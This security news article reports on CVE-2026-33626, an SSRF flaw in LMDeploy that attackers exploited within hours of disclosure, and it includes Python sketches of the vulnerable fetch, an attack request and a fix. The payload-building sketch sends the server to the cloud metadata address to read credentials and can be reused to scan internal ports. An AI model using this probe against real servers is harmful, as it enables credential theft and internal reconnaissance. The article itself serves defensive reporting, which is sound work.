A critical security lapse in AI infrastructure has once again highlighted how quickly threat actors can weaponize newly disclosed vulnerabilities, raising concerns across the cybertech ecosystem. A newly disclosed LMDeploy vulnerability, tracked as CVE-2026-33626, was exploited in the wild just 12 hours and 31 minutes after its public advisory was released on GitHub. The flaw, a server-side request forgery (SSRF) issue, affects LMDeploy, a toolkit developed by the Shanghai AI Laboratory under its InternLM project. The platform is widely used for serving large language models and vision-language systems through an OpenAI-compatible API.

The vulnerability was disclosed on April 21, 2026, through advisory GHSA-6w67-hwm5-92mq and affects versions prior to 0.12.3. At the core of the issue is a flawed implementation of the image-loading function, which fetches arbitrary URLs without validating hostnames, IP ranges, or request schemes. This oversight enables attackers to force the model server to make unauthorized HTTP requests to internal systems, cloud metadata services, and other restricted endpoints.
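In simplified form, the vulnerable pattern the advisory describes looks like the following sketch. This is a hypothetical illustration of an unvalidated server-side fetch, not LMDeploy's actual code:

```python
# Hypothetical, simplified sketch of the vulnerable pattern described in the
# advisory -- NOT LMDeploy's actual implementation.
import urllib.request

def load_image_unsafe(url: str) -> bytes:
    # No hostname, IP-range, or scheme checks: any URL the caller supplies
    # is fetched by the *server* itself, including internal-only addresses
    # such as http://169.254.169.254/ (cloud metadata) or
    # http://127.0.0.1:6379/ (a local Redis instance).
    with urllib.request.urlopen(url) as resp:
        return resp.read()
```

Because the scheme is never checked either, even non-HTTP URLs (for example, data: URLs) pass straight through to the fetch layer.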

According to findings from the Sysdig Threat Research Team, the first exploitation attempt occurred at 03:35 UTC on April 22, originating from an IP address based in Kowloon Bay, Hong Kong. Notably, this attack was observed before any public proof-of-concept exploit code became widely available, underscoring how adversaries are increasingly capable of translating vulnerability disclosures directly into actionable exploits.

The attack activity revealed a structured and deliberate approach. Initial probes targeted the AWS Instance Metadata Service at 169.254.169.254, aiming to extract IAM credentials. The attacker then scanned local services including Redis on port 6379 and MySQL on port 3306, along with potential administrative interfaces running on ports 80 and 8080. To confirm blind SSRF behavior, the attacker used an external callback domain, a common technique for validating outbound connectivity in modern exploitation scenarios.
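Against an OpenAI-compatible vision endpoint, such a probe can be delivered as an ordinary chat-completion request whose image URL points at an internal target. The sketch below illustrates the general payload shape; the model name and metadata path are illustrative assumptions, not observed indicators from the attack:

```python
# Illustrative sketch of the request shape an attacker could send to an
# OpenAI-compatible vision endpoint to trigger the SSRF. The model name
# and target path are placeholders, not observed indicators.
import json

def make_ssrf_probe(target_url: str, model: str = "example-vl-model") -> str:
    payload = {
        "model": model,  # placeholder model name
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                # The server, not the client, fetches this URL.
                {"type": "image_url", "image_url": {"url": target_url}},
            ],
        }],
    }
    return json.dumps(payload)

# Example target mirroring the first observed probe class: the AWS
# Instance Metadata Service at 169.254.169.254.
probe = make_ssrf_probe("http://169.254.169.254/latest/meta-data/")
```

The same request shape works for the follow-on port scans; only the embedded URL changes (for example, http://127.0.0.1:6379/ for Redis).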

Beyond simple reconnaissance, the attacker also attempted to interact with an unauthenticated administrative endpoint within LMDeploy’s distributed serving architecture. This indicates a deeper understanding of the platform’s internal design and suggests the potential for disrupting model inference processes or enabling lateral movement within AI infrastructure environments.

Security experts have rated CVE-2026-33626 as high severity with a CVSS score of 7.5, affecting all LMDeploy versions prior to 0.12.3. The patched release introduces stricter URL validation controls to block access to link-local, loopback, and private network ranges, effectively closing the primary exploitation vector.
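The kind of validation the patch describes can be sketched with Python's standard ipaddress module. This is an illustration of the general approach, not the actual code shipped in LMDeploy 0.12.3:

```python
# Minimal sketch of SSRF-style URL validation: reject non-HTTP schemes and
# any IP target that is not globally routable (covers link-local, loopback,
# and private ranges). Illustration only, not the actual LMDeploy patch.
import ipaddress
from urllib.parse import urlparse

def is_safe_image_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False  # block file:, data:, gopher:, etc.
    host = parsed.hostname
    if host is None:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostname rather than an IP literal: a real implementation must
        # resolve it and check every resulting address (and defend against
        # DNS rebinding). Simplified here for illustration.
        return True
    # is_global is False for link-local (169.254.0.0/16), loopback,
    # and private (RFC 1918) addresses.
    return ip.is_global
```

Checking only the literal URL string is not enough in production; the resolved addresses must be validated at connection time, since a benign-looking hostname can resolve to an internal IP.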

The rapid exploitation of this LMDeploy vulnerability underscores a broader industry shift: traditional patch cycles are no longer sufficient against fast-moving threats targeting AI serving environments. As organizations continue to deploy large language models and inference systems at scale, the need for real-time threat detection, rapid patching, and stricter network controls is becoming increasingly urgent. This incident serves as a clear reminder that AI infrastructure is now a prime target, and securing it requires the same rigor applied to core enterprise systems.
